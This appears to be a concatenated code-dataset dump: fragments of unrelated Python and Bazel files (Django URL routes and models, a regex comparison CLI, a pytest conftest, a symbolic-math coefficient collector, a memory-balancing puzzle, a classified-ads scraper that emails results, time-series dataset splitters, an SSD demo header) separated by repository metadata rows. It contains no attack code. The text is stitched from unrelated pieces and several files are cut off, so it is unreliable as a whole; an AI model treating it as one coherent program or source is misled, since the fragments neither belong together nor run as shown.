url(r'^worker_page/(?P<pk>\d+)/$', hire_views.worker_page, name='worker_page'),
url(r'^increment/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/$', hire_views.increment, name='increment'),
url(r'^decrement/(?P<pk>\d+)/(?P<Service_category_pk>\d+)/review/$', hire_views.decrement, name='decrement'),
# url(r'^user/$', hire_views.model_form_upload, name='model_form_upload'),
url(r'^hello/$', hire_views.hello, name='hello'),
]
if settings.DEBUG == True:
urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
| 50.147541 | 119 | 0.676038 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,603 | 0.524027 |
7322d738208c1e92a29dc1677393b7f139a60b9b | 1,546 | py | Python | re_compare/re_compare.py | gchase/re-compare | c717094053fd5938ea7f0a46dcfec75bc077cb7e | [
"MIT"
]
| null | null | null | re_compare/re_compare.py | gchase/re-compare | c717094053fd5938ea7f0a46dcfec75bc077cb7e | [
"MIT"
]
| null | null | null | re_compare/re_compare.py | gchase/re-compare | c717094053fd5938ea7f0a46dcfec75bc077cb7e | [
"MIT"
]
| null | null | null | #!/usr/bin/env python3
import logging
import argparse
import traceback
import os
import sys
from analysis import Analysis
from collector import Collector
from config import DEBUG, DEFAULT_LOG_FILE_DIR
def is_dir(dirname):
if not os.path.isdir(dirname):
msg = "{0} is not a directory".format(dirname)
raise argparse.ArgumentTypeError(msg)
else:
return dirname
def main():
if DEBUG:
logging.basicConfig(
stream=sys.stdout,
level=logging.INFO,
format=
'[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',
datefmt="%H:%M:%S")
parser = argparse.ArgumentParser()
parser.add_argument('--task', type=lambda x: is_dir(x))
parser.add_argument(
'--test_types',
nargs="+",
choices=['first_match', 'all_matches', 'consecutive_matches'])
parser.add_argument('--log_files', nargs='+', type=argparse.FileType())
parser.set_defaults(
test_types=['first_match', 'all_matches', 'consecutive_matches'])
args = parser.parse_args()
if args.log_files:
logging.info('starting analysis')
Analysis(files=args.log_files).analyze_logs()
logging.info('finished analysis')
else:
logging.info('starting collection')
Collector(args.task).collect()
logging.info('finished collection')
logging.info('starting analysis')
Analysis(logs_dir=DEFAULT_LOG_FILE_DIR).analyze_logs()
if __name__ == '__main__':
main()
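# --- Illustrative invocations; not part of the original script. ---
# The task directory and log file names are assumptions made for the demo.
#   Collection followed by analysis over a task directory:
#       python re_compare.py --task tasks/email_patterns --test_types first_match
#   Analysis only, over previously collected log files:
#       python re_compare.py --log_files logs/a.log logs/b.log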
| 24.539683 | 82 | 0.641656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 369 | 0.23868 |
7323e7284674358cab716226cc5bccd1b52ec055 | 1,216 | py | Python | venv/Lib/site-packages/nipype/conftest.py | richung99/digitizePlots | 6b408c820660a415a289726e3223e8f558d3e18b | [
"MIT"
]
| 585 | 2015-01-12T16:06:47.000Z | 2022-03-26T14:51:08.000Z | nipype/conftest.py | tamires-consulting/nipype | b7879d75a63b6500b2e7d2c3eba5aa7670339274 | [
"Apache-2.0"
]
| 2,329 | 2015-01-01T09:56:41.000Z | 2022-03-30T14:24:49.000Z | nipype/conftest.py | tamires-consulting/nipype | b7879d75a63b6500b2e7d2c3eba5aa7670339274 | [
"Apache-2.0"
]
| 487 | 2015-01-20T01:04:52.000Z | 2022-03-21T21:22:47.000Z | import os
import shutil
from tempfile import mkdtemp
import pytest
import numpy
import py.path as pp
NIPYPE_DATADIR = os.path.realpath(
os.path.join(os.path.dirname(__file__), "testing/data")
)
temp_folder = mkdtemp()
data_dir = os.path.join(temp_folder, "data")
shutil.copytree(NIPYPE_DATADIR, data_dir)
@pytest.fixture(autouse=True)
def add_np(doctest_namespace):
doctest_namespace["np"] = numpy
doctest_namespace["os"] = os
doctest_namespace["pytest"] = pytest
doctest_namespace["datadir"] = data_dir
@pytest.fixture(autouse=True)
def _docdir(request):
"""Grabbed from https://stackoverflow.com/a/46991331"""
# Trigger ONLY for the doctests.
doctest_plugin = request.config.pluginmanager.getplugin("doctest")
if isinstance(request.node, doctest_plugin.DoctestItem):
# Get the fixture dynamically by its name.
tmpdir = pp.local(data_dir)
# Chdir only for the duration of the test.
with tmpdir.as_cwd():
yield
else:
# For normal tests, we have to yield, since this is a yield-fixture.
yield
def pytest_unconfigure(config):
# Delete temp folder after session is finished
shutil.rmtree(temp_folder)
| 26.434783 | 76 | 0.709704 | 0 | 0 | 540 | 0.444079 | 784 | 0.644737 | 0 | 0 | 339 | 0.278783 |
732764ebd0702a98bf1fa40e238672b9d8162849 | 397 | py | Python | tests/test_modules/test_ADPandABlocks/test_adpandablocks_blocks.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
]
| null | null | null | tests/test_modules/test_ADPandABlocks/test_adpandablocks_blocks.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
]
| null | null | null | tests/test_modules/test_ADPandABlocks/test_adpandablocks_blocks.py | aaron-parsons/pymalcolm | 4e7ebd6b09382ab7e013278a81097d17873fa5c4 | [
"Apache-2.0"
]
| null | null | null | from mock import Mock
from malcolm.testutil import ChildTestCase
from malcolm.modules.ADPandABlocks.blocks import pandablocks_runnable_block
class TestADPandABlocksBlocks(ChildTestCase):
def test_pandablocks_runnable_block(self):
self.create_child_block(
pandablocks_runnable_block, Mock(),
mri_prefix="mri_prefix", pv_prefix="pv_prefix", config_dir="/tmp")
| 33.083333 | 78 | 0.7733 | 252 | 0.634761 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.073048 |
73276ed229a6cddfa545672ed9e4e28191eeb79e | 2,939 | py | Python | pymbolic/mapper/coefficient.py | sv2518/pymbolic | 42687a410b1c355beec510b91c18f97e5137795b | [
"MIT"
]
| null | null | null | pymbolic/mapper/coefficient.py | sv2518/pymbolic | 42687a410b1c355beec510b91c18f97e5137795b | [
"MIT"
]
| null | null | null | pymbolic/mapper/coefficient.py | sv2518/pymbolic | 42687a410b1c355beec510b91c18f97e5137795b | [
"MIT"
]
| null | null | null | __copyright__ = "Copyright (C) 2013 Andreas Kloeckner"
__license__ = """
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from pymbolic.mapper import Mapper
class CoefficientCollector(Mapper):
def __init__(self, target_names=None):
self.target_names = target_names
def map_sum(self, expr):
stride_dicts = [self.rec(ch) for ch in expr.children]
result = {}
for stride_dict in stride_dicts:
for var, stride in stride_dict.items():
if var in result:
result[var] += stride
else:
result[var] = stride
return result
def map_product(self, expr):
result = {}
children_coeffs = [self.rec(child) for child in expr.children]
idx_of_child_with_vars = None
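        # The product is linear only if at most one factor contains variables;
        # remember which factor that is and raise if a second one shows up.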
for i, child_coeffs in enumerate(children_coeffs):
for k in child_coeffs:
if k != 1:
if (idx_of_child_with_vars is not None
and idx_of_child_with_vars != i):
raise RuntimeError(
"nonlinear expression")
idx_of_child_with_vars = i
other_coeffs = 1
for i, child_coeffs in enumerate(children_coeffs):
if i != idx_of_child_with_vars:
assert len(child_coeffs) == 1
other_coeffs *= child_coeffs[1]
if idx_of_child_with_vars is None:
return {1: other_coeffs}
else:
return {
var: other_coeffs*coeff
for var, coeff in
children_coeffs[idx_of_child_with_vars].items()}
return result
def map_constant(self, expr):
return {1: expr}
def map_algebraic_leaf(self, expr):
if self.target_names is None or expr.name in self.target_names:
return {expr: 1}
else:
return {1: expr}
| 35.841463 | 77 | 0.639673 | 1,799 | 0.612113 | 0 | 0 | 0 | 0 | 0 | 0 | 1,090 | 0.370874 |
7328644eaa6b2ec01fefc42231719421b2897b5b | 1,958 | py | Python | day_06/balancer.py | anglerud/advent_of_code_2017 | eff27d43cd9eb7c60271887c80cb88f1ae50c48d | [
"MIT"
]
| 3 | 2017-12-06T21:23:19.000Z | 2020-04-12T09:49:53.000Z | day_06/balancer.py | anglerud/advent_of_code_2017 | eff27d43cd9eb7c60271887c80cb88f1ae50c48d | [
"MIT"
]
| null | null | null | day_06/balancer.py | anglerud/advent_of_code_2017 | eff27d43cd9eb7c60271887c80cb88f1ae50c48d | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# coding: utf-8
""" """
import typing as t
import attr
import click
@attr.s(frozen=True)
class Memory(object):
banks: t.Tuple[int, ...] = attr.ib()
def balance(self) -> 'Memory':
mem = list(self.banks)
num_banks = len(self.banks)
# Find the amount of blocks to balance - remove them from that bank.
blocks_to_balance = max(mem)
bank_pointer = mem.index(blocks_to_balance)
mem[bank_pointer] = 0
# Rebalance
balance_rounds = 0
while blocks_to_balance > 0:
# Advance the pointer.
bank_pointer = (bank_pointer + 1) % num_banks
mem[bank_pointer] += 1
blocks_to_balance -= 1
return Memory(
banks=tuple(mem)
)
def detect_loop(memory: Memory) -> t.Tuple[int, Memory]:
    """Find how many balance rounds pass until an arrangement repeats, returning the count and the repeated memory."""
arrangements_seen = set()
balancer_rounds = 0
while memory not in arrangements_seen:
arrangements_seen.add(memory)
memory = memory.balance()
balancer_rounds += 1
return balancer_rounds, memory
@click.group()
def balancer():
"""Balancing memory like they were spinning tops."""
pass
@balancer.command()
@click.argument('memory_banks', type=click.File())
def distribute(memory_banks):
banks = tuple(map(int, memory_banks.read().split()))
memory = Memory(banks)
steps, memory = detect_loop(memory)
msg = f"Loop found after {steps} balance rounds."
click.secho(msg, fg='green')
@balancer.command()
@click.argument('memory_banks', type=click.File())
def loop_size(memory_banks):
banks = tuple(map(int, memory_banks.read().split()))
memory = Memory(banks)
_, memory = detect_loop(memory)
loop_size, _ = detect_loop(memory)
msg = f"Loop size is {loop_size}."
click.secho(msg, fg='green')
def main():
"""Entrypoint."""
balancer()
if __name__ == '__main__':
main()
| 23.035294 | 76 | 0.62666 | 673 | 0.343718 | 0 | 0 | 1,433 | 0.731869 | 0 | 0 | 393 | 0.200715 |
7329f5fd535980ef38334fa719dd3596b7005058 | 176 | py | Python | python-while/exercise4.py | crobert7/Py-Basics | c1d1a1441de6cbee409c59ddda2b11bc7ee16df1 | [
"MIT"
]
| null | null | null | python-while/exercise4.py | crobert7/Py-Basics | c1d1a1441de6cbee409c59ddda2b11bc7ee16df1 | [
"MIT"
]
| null | null | null | python-while/exercise4.py | crobert7/Py-Basics | c1d1a1441de6cbee409c59ddda2b11bc7ee16df1 | [
"MIT"
]
| null | null | null | word = input('Type a word: ')
while word != 'chupacabra':
word = input('Type a word: ')
if word == 'chupacabra':
print('You are out of the loop')
break | 25.142857 | 40 | 0.5625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 79 | 0.448864 |
732ac32a2f056f0d1b4317192e07425ea49f8e2a | 1,268 | bzl | Python | pw_build/selects.bzl | mspang/pigweed | 89ff5f98f38b1ff7a1ff0633c590479e9b592a14 | [
"Apache-2.0"
]
| null | null | null | pw_build/selects.bzl | mspang/pigweed | 89ff5f98f38b1ff7a1ff0633c590479e9b592a14 | [
"Apache-2.0"
]
| 1 | 2021-06-18T13:54:41.000Z | 2021-06-18T13:54:41.000Z | pw_build/selects.bzl | mspang/pigweed | 89ff5f98f38b1ff7a1ff0633c590479e9b592a14 | [
"Apache-2.0"
]
| null | null | null | # Copyright 2021 The Pigweed Authors
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
_RTOS_NONE = "//pw_build/constraints/rtos:none"
# Common select for tagging a target as only compatible with host OS's. This
# select implements the logic '(Windows or Macos or Linux) and not RTOS'.
# Example usage:
# load("//pw_build:selects.bzl","TARGET_COMPATIBLE_WITH_HOST_SELECT")
# pw_cc_library(
# name = "some_host_only_lib",
# hdrs = ["host.h"],
# target_compatible_with = select(TARGET_COMPATIBLE_WITH_HOST_SELECT),
# )
TARGET_COMPATIBLE_WITH_HOST_SELECT = {
"@platforms//os:windows": [_RTOS_NONE],
"@platforms//os:macos": [_RTOS_NONE],
"@platforms//os:linux": [_RTOS_NONE],
"//conditions:default": ["@platforms//:incompatible"],
}
| 39.625 | 79 | 0.729495 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,119 | 0.882492 |
732b698a8ba47881b21329d7619d19e7979a1509 | 1,433 | py | Python | subscriptions/models.py | emil-magnusson/py-on-api | 50967ea9d6a189c2c1cb75bd3e2b8ab817077634 | [
"MIT"
]
| null | null | null | subscriptions/models.py | emil-magnusson/py-on-api | 50967ea9d6a189c2c1cb75bd3e2b8ab817077634 | [
"MIT"
]
| 4 | 2021-03-30T14:10:30.000Z | 2021-09-22T19:29:56.000Z | subscriptions/models.py | emil-magnusson/py-on-api | 50967ea9d6a189c2c1cb75bd3e2b8ab817077634 | [
"MIT"
]
| null | null | null | # subscriptions/models.py
import uuid
from django.db import models
from accesses.models import Accesses, Services
class OperationalState(models.Model):
operationalState = models.CharField(primary_key=True, max_length=50)
def __str__(self):
return self.operationalState
class Subscriptions(models.Model):
subscriptionId = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
accessId = models.ForeignKey(Accesses, related_name='subscriptions', on_delete=models.PROTECT)
service = models.ForeignKey(Services, on_delete=models.PROTECT)
operationalState = models.ForeignKey(OperationalState, on_delete=models.PROTECT)
    spReference = models.CharField(max_length=50, default=uuid.uuid4().hex[:6].upper())  # note: evaluated once at import time, so all rows share this default unless overridden
spSubscriptionId = models.UUIDField(default=uuid.uuid4, editable=False)
#option82 = models.OneToOneField(Option82, on_delete=models.PROTECT)
##dhcpIdentifier
note = models.CharField(max_length=350, null=True, blank=True)
##characteristics
def __str__(self):
return '{} - {}'.format(self.service, self.subscriptionId)
class Equipment(models.Model):
subscriptionId = models.ForeignKey(Subscriptions, related_name='equipment', on_delete=models.PROTECT)
vendorId = models.CharField(max_length=250)
macAddress = models.CharField(max_length=250)
def __str__(self):
return '{} - {}'.format(self.vendorId, self.macAddress)
| 37.710526 | 105 | 0.752966 | 1,309 | 0.913468 | 0 | 0 | 0 | 0 | 0 | 0 | 170 | 0.118632 |
732bbfe89e64414c6afc65b3cfb58bb41674d875 | 2,848 | py | Python | leboncrevard/job.py | mclbn/leboncrevard | ee1b2a445eeda8f8561b5c62289b994dff38cfa9 | [
"ISC"
]
| 5 | 2017-03-14T00:28:13.000Z | 2019-02-06T15:38:21.000Z | leboncrevard/job.py | mclbn/leboncrevard | ee1b2a445eeda8f8561b5c62289b994dff38cfa9 | [
"ISC"
]
| null | null | null | leboncrevard/job.py | mclbn/leboncrevard | ee1b2a445eeda8f8561b5c62289b994dff38cfa9 | [
"ISC"
]
| 5 | 2017-02-25T07:31:26.000Z | 2019-02-06T15:38:27.000Z | import smtplib
import time
from email.mime.text import MIMEText
from leboncrevard import scrapper, config
class LbcJob:
def __init__(self, name, url, interval, recipients):
self.name = name
self.url = url
self.scrapper = scrapper.LbcScrapper(url)
self.interval = interval
self.recipients = recipients
self.outfile = name + ".csv"
self.shouldrun = True
def __eq__(self, other):
if self.name != other.name:
return False
if self.url != other.url:
return False
# Ignoring interval and recipients for now
# if self.interval != other.interval:
# return False
# if self.recipients != other.recipients:
# return False
return True
def disable(self):
self.shouldrun = False
def enable(self):
        self.shouldrun = True
def run(self):
if not self.shouldrun:
return
if self.scrapper.test_connectivity() is False:
print("No connectivity, aborting for now...")
return False
else:
print("Starting scraping job: " + self.name)
ads = self.scrapper.scrap()
if ads is None:
print("Nothing to scrap for " + self.name + ", aborting job.")
return False
text = ""
hashes = ""
f = open(self.outfile, "a+")
f.seek(0)
lines = f.read()
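            # The CSV file acts as a seen-ads cache: one line per ad with date,
            # link and content hash. Known links are skipped; a known hash under
            # a new link is reported as a repost.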
for ad in ads:
ad_hash = ad.get_hash()
line = "\"" + ad.get_link() + "\"," + ad_hash
if lines.find(line) != -1:
print("Known ad, skipping.")
continue
if lines.find(ad_hash) != -1:
text += "Repost: "
print("Unknown ad, sending...")
text += ad.get_text()
hashes += time.strftime("%d-%m-%y") + "," + line + "\n"
if len(text) > 0:
for recipient in self.recipients:
print(recipient)
try:
print("Sending mail...")
msg = MIMEText(text)
msg['Subject'] = "Nouvelles annonces (" + self.name + ")"
msg['From'] = config.SMTP_USER
msg['To'] = recipient
s = smtplib.SMTP(config.SMTP_SERVER)
s.ehlo()
s.starttls()
s.login(config.SMTP_USER, config.SMTP_PASS)
s.send_message(msg)
s.quit()
f.write(hashes)
except Exception as e:
print(str(e))
pass
f.close()
| 33.904762 | 81 | 0.458567 | 2,738 | 0.961376 | 0 | 0 | 0 | 0 | 0 | 0 | 415 | 0.145716 |
732c359d55e1699fb9b02c52c8e5453f0946a5bf | 13,825 | py | Python | tsl/data/datamodule/splitters.py | TorchSpatiotemporal/tsl | da13493b0cf83826bf41fe78a67e8d4ce1d7a8a0 | [
"MIT"
]
| 4 | 2022-03-21T09:16:33.000Z | 2022-03-30T12:24:30.000Z | tsl/data/datamodule/splitters.py | TorchSpatiotemporal/tsl | da13493b0cf83826bf41fe78a67e8d4ce1d7a8a0 | [
"MIT"
]
| null | null | null | tsl/data/datamodule/splitters.py | TorchSpatiotemporal/tsl | da13493b0cf83826bf41fe78a67e8d4ce1d7a8a0 | [
"MIT"
]
| null | null | null | import functools
from copy import deepcopy
from datetime import datetime
from typing import Mapping, Callable, Union, Tuple, Optional
import numpy as np
from tsl.utils.python_utils import ensure_list
from ..spatiotemporal_dataset import SpatioTemporalDataset
from ..utils import SynchMode
__all__ = [
'Splitter',
'CustomSplitter',
'TemporalSplitter',
'AtTimeStepSplitter',
]
from ...typing import Index
class Splitter:
r"""Base class for splitter module."""
def __init__(self):
self.__indices = dict()
self._fitted = False
self.reset()
def __new__(cls, *args, **kwargs) -> "Splitter":
obj = super().__new__(cls)
# track `fit` calls
obj.fit = cls._track_fit(obj, obj.fit)
return obj
@staticmethod
def _track_fit(obj: "Splitter", fn: callable) -> callable:
"""A decorator to track fit calls.
When ``splitter.fit(...)`` is called, :obj:`splitter.fitted` is set to
:obj:`True`.
Args:
obj: Object whose function will be tracked.
fn: Function that will be wrapped.
Returns:
Decorated method to track :obj:`fit` calls.
"""
@functools.wraps(fn)
def fit(dataset: SpatioTemporalDataset) -> dict:
fn(dataset)
obj._fitted = True
return obj.indices
return fit
def __getstate__(self) -> dict:
# avoids _pickle.PicklingError: Can't pickle <...>: it's not the same
# object as <...>
d = self.__dict__.copy()
del d['fit']
return d
def __call__(self, *args, **kwargs):
return self.split(*args, **kwargs)
def __repr__(self):
lens = ", ".join(map(lambda kv: "%s=%s" % kv, self.lens().items()))
return "%s(%s)" % (self.__class__.__name__, lens)
@property
def indices(self):
return self.__indices
@property
def fitted(self):
return self._fitted
@property
def train_idxs(self):
return self.__indices.get('train')
@property
def val_idxs(self):
return self.__indices.get('val')
@property
def test_idxs(self):
return self.__indices.get('test')
@property
def train_len(self):
return len(self.train_idxs) if self.train_idxs is not None else None
@property
def val_len(self):
return len(self.val_idxs) if self.val_idxs is not None else None
@property
def test_len(self):
return len(self.test_idxs) if self.test_idxs is not None else None
def set_indices(self, train=None, val=None, test=None):
if train is not None:
self.__indices['train'] = train
if val is not None:
self.__indices['val'] = val
if test is not None:
self.__indices['test'] = test
def reset(self):
self.__indices = dict(train=None, val=None, test=None)
self._fitted = False
def lens(self) -> dict:
return dict(train_len=self.train_len, val_len=self.val_len,
test_len=self.test_len)
def copy(self) -> "Splitter":
copy = Splitter()
copy.__dict__ = deepcopy(self.__dict__)
return copy
def fit(self, dataset: SpatioTemporalDataset):
raise NotImplementedError
def split(self, dataset: SpatioTemporalDataset) -> dict:
if self.fitted:
return self.indices
else:
return self.fit(dataset)
class CustomSplitter(Splitter):
def __init__(self, val_split_fn: Callable = None,
test_split_fn: Callable = None,
val_kwargs: Mapping = None,
test_kwargs: Mapping = None,
mask_test_indices_in_val: bool = True):
super(CustomSplitter, self).__init__()
self.val_split_fn = val_split_fn
self.test_split_fn = test_split_fn
self.val_kwargs = val_kwargs or dict()
self.test_kwargs = test_kwargs or dict()
self.mask_test_indices_in_val = mask_test_indices_in_val
@property
def val_policy(self):
return self.val_split_fn.__name__ if callable(
self.val_split_fn) else None
@property
def test_policy(self):
return self.test_split_fn.__name__ if callable(
self.test_split_fn) else None
def fit(self, dataset: SpatioTemporalDataset):
_, test_idxs = self.test_split_fn(dataset, **self.test_kwargs)
val_kwargs = self.val_kwargs
if self.mask_test_indices_in_val and len(test_idxs):
val_kwargs = dict(**self.val_kwargs, mask=test_idxs)
train_idxs, val_idxs = self.val_split_fn(dataset, **val_kwargs)
self.set_indices(train_idxs, val_idxs, test_idxs)
class FixedIndicesSplitter(Splitter):
def __init__(self, train_idxs: Optional[Index] = None,
val_idxs: Optional[Index] = None,
test_idxs: Optional[Index] = None):
super(FixedIndicesSplitter, self).__init__()
self.set_indices(train_idxs, val_idxs, test_idxs)
self._fitted = True
def fit(self, dataset: SpatioTemporalDataset):
pass
class TemporalSplitter(Splitter):
def __init__(self, val_len: int = None, test_len: int = None):
super(TemporalSplitter, self).__init__()
self._val_len = val_len
self._test_len = test_len
def fit(self, dataset: SpatioTemporalDataset):
idx = np.arange(len(dataset))
val_len, test_len = self._val_len, self._test_len
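        # Values below 1 are treated as fractions: test_len of the whole set,
        # val_len of what remains after removing the test split.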
if test_len < 1:
test_len = int(test_len * len(idx))
if val_len < 1:
val_len = int(val_len * (len(idx) - test_len))
test_start = len(idx) - test_len
val_start = test_start - val_len
self.set_indices(idx[:val_start - dataset.samples_offset],
idx[val_start:test_start - dataset.samples_offset],
idx[test_start:])
@staticmethod
def add_argparse_args(parser):
parser.add_argument('--val-len', type=float or int, default=0.1)
parser.add_argument('--test-len', type=float or int, default=0.2)
return parser
class AtTimeStepSplitter(Splitter):
def __init__(self, first_val_ts: Union[Tuple, datetime] = None,
first_test_ts: Union[Tuple, datetime] = None):
super(AtTimeStepSplitter, self).__init__()
self.first_val_ts = first_val_ts
self.first_test_ts = first_test_ts
def fit(self, dataset: SpatioTemporalDataset):
train_idx, test_idx = split_at_ts(dataset, ts=self.first_test_ts)
train_idx, val_idx = split_at_ts(dataset, ts=self.first_val_ts,
mask=test_idx)
return self.set_indices(train_idx, val_idx, test_idx)
@staticmethod
def add_argparse_args(parser):
parser.add_argument('--first-val-ts', type=list or tuple, default=None)
parser.add_argument('--first-test-ts', type=list or tuple, default=None)
return parser
###
def indices_between(dataset: SpatioTemporalDataset,
first_ts: Union[Tuple, datetime] = None,
last_ts: Union[Tuple, datetime] = None):
if first_ts is not None:
if isinstance(first_ts, datetime):
pass
elif isinstance(first_ts, (tuple, list)) and len(first_ts) >= 3:
first_ts = datetime(*first_ts, tzinfo=dataset.index.tzinfo)
else:
raise TypeError("first_ts must be a datetime or a tuple")
if last_ts is not None:
if isinstance(last_ts, datetime):
pass
elif isinstance(last_ts, (tuple, list)) and len(last_ts) >= 3:
last_ts = datetime(*last_ts, tzinfo=dataset.index.tzinfo)
else:
raise TypeError("last_ts must be a datetime or a tuple")
first_day_loc, last_day_loc = dataset.index.slice_locs(first_ts, last_ts)
first_sample_loc = first_day_loc - dataset.horizon_offset
last_sample_loc = last_day_loc - dataset.horizon_offset - 1
indices_from_sample = np.where((first_sample_loc <= dataset.indices) & (
dataset.indices < last_sample_loc))[0]
return indices_from_sample
def split_at_ts(dataset, ts, mask=None):
from_day_idxs = indices_between(dataset, first_ts=ts)
prev_idxs = np.arange(
from_day_idxs[0] if len(from_day_idxs) else len(dataset))
if mask is not None:
from_day_idxs = np.setdiff1d(from_day_idxs, mask)
prev_idxs = np.setdiff1d(prev_idxs, mask)
return prev_idxs, from_day_idxs
def disjoint_months(dataset, months=None, synch_mode=SynchMode.WINDOW):
idxs = np.arange(len(dataset))
months = ensure_list(months)
# divide indices according to window or horizon
if synch_mode is SynchMode.WINDOW:
start = 0
end = dataset.window - 1
elif synch_mode is SynchMode.HORIZON:
start = dataset.horizon_offset
end = dataset.horizon_offset + dataset.horizon - 1
else:
raise ValueError('synch_mode can only be one of %s'
% [SynchMode.WINDOW, SynchMode.HORIZON])
# after idxs
indices = np.asarray(dataset._indices)
start_in_months = np.in1d(dataset.index[indices + start].month, months)
end_in_months = np.in1d(dataset.index[indices + end].month, months)
idxs_in_months = start_in_months & end_in_months
after_idxs = idxs[idxs_in_months]
# previous idxs
months = np.setdiff1d(np.arange(1, 13), months)
start_in_months = np.in1d(dataset.index[indices + start].month, months)
end_in_months = np.in1d(dataset.index[indices + end].month, months)
idxs_in_months = start_in_months & end_in_months
prev_idxs = idxs[idxs_in_months]
return prev_idxs, after_idxs
# SPLIT FUNCTIONS
def split_function_builder(fn, *args, name=None, **kwargs):
def wrapper_split_fn(dataset, length=None, mask=None):
return fn(dataset, length=length, mask=mask, *args, **kwargs)
wrapper_split_fn.__name__ = name or "wrapped__%s" % fn.__name__
return wrapper_split_fn
def subset_len(length, set_size, period=None):
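    # Interpret `length` as a fraction of `period` when in (0, 1); absolute
    # lengths in [period, set_size) are rescaled proportionally to `period`.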
if period is None:
period = set_size
if length is None or length <= 0:
length = 0
if 0. < length < 1.:
length = max(int(length * period), 1)
elif period <= length < set_size:
length = int(length / set_size * period)
elif length > set_size:
raise ValueError("Provided length of %i is greater than set_size %i" % (
length, set_size))
return length
def tail_of_period(iterable, length, mask=None, period=None):
size = len(iterable)
period = period or size
if mask is None:
mask = []
indices = np.arange(size)
length = subset_len(length, size, period)
prev_idxs, after_idxs = [], []
for batch_idxs in [indices[i:i + period] for i in range(0, size, period)]:
batch_idxs = np.setdiff1d(batch_idxs, mask)
prev_idxs.extend(batch_idxs[:len(batch_idxs) - length])
after_idxs.extend(batch_idxs[len(batch_idxs) - length:])
return np.array(prev_idxs), np.array(after_idxs)
def random(iterable, length, mask=None):
size = len(iterable)
if mask is None:
mask = []
indices = np.setdiff1d(np.arange(size), mask)
np.random.shuffle(indices)
split_at = len(indices) - subset_len(length, size)
res = [np.sort(indices[:split_at]), np.sort(indices[split_at:])]
return res
def past_pretest_days(dataset, length, mask):
# get the first day of testing, as the first step of the horizon
keep_until = np.min(mask)
first_testing_day_idx = dataset._indices[keep_until]
first_testing_day = dataset.index[
first_testing_day_idx + dataset.lookback + dataset.delay]
# extract samples before first day of testing through the years
tz_info = dataset.index.tzinfo
years = sorted(set(dataset.index.year))
yearly_testing_loc = []
for year in years:
ftd_year = datetime(year, first_testing_day.month,
first_testing_day.day, tzinfo=tz_info)
yearly_testing_loc.append(dataset.index.slice_locs(ftd_year)[0])
yearly_train_samples = [
np.where(dataset._indices < ytl - dataset.lookback - dataset.delay)[0]
for ytl in yearly_testing_loc]
# filter the years in which there are no such samples
yearly_train_samples = [yts for yts in yearly_train_samples if len(yts) > 0]
# for each year excluding the last take the last "val_len // n_years" samples
yearly_val_len = length // len(yearly_train_samples)
yearly_val_lens = [min(yearly_val_len, len(yts)) for yts in
yearly_train_samples[:-1]]
# for the last year, take the remaining number of samples needed to reach val_len
    # This value is always at least as large as the per-year lengths above, so the last
    # year contributes at least as many validation samples as any other year.
yearly_val_lens.append(length - sum(yearly_val_lens))
# finally extracts the validation samples
val_idxs = [idxs[-val_len:] for idxs, val_len in
zip(yearly_train_samples, yearly_val_lens)]
val_idxs = np.concatenate(val_idxs)
# recompute training and test indices
all_idxs = np.arange(len(dataset))
train_idxs = np.setdiff1d(all_idxs, val_idxs)
return train_idxs, val_idxs
def last_month(dataset, mask=None):
if mask is not None:
keep_until = np.min(mask)
last_day_idx = dataset._indices[keep_until]
last_day = dataset.index[last_day_idx]
else:
last_day = dataset.index[-1]
split_day = (last_day.year, last_day.month, 1)
return split_at_ts(dataset, split_day, mask)
# aliases
temporal = TemporalSplitter
at_ts = AtTimeStepSplitter
| 34.051724 | 115 | 0.650922 | 6,604 | 0.477685 | 0 | 0 | 2,003 | 0.144882 | 0 | 0 | 1,570 | 0.113562 |
732d71e2f7609d24712a7e6d1541ad6047bd54bf | 3,483 | py | Python | demo.py | bringBackm/SSD | 6cbc9018fd7365d7c65cf6d4da90c14cced5e542 | [
"MIT"
]
| null | null | null | demo.py | bringBackm/SSD | 6cbc9018fd7365d7c65cf6d4da90c14cced5e542 | [
"MIT"
]
| null | null | null | demo.py | bringBackm/SSD | 6cbc9018fd7365d7c65cf6d4da90c14cced5e542 | [
"MIT"
]
| null | null | null | import glob
import os
import torch
from PIL import Image
from tqdm import tqdm
from ssd.config import cfg
from ssd.data.datasets import COCODataset, VOCDataset
from ssd.modeling.predictor import Predictor
from ssd.modeling.vgg_ssd import build_ssd_model
import argparse
import numpy as np
from ssd.utils.viz import draw_bounding_boxes
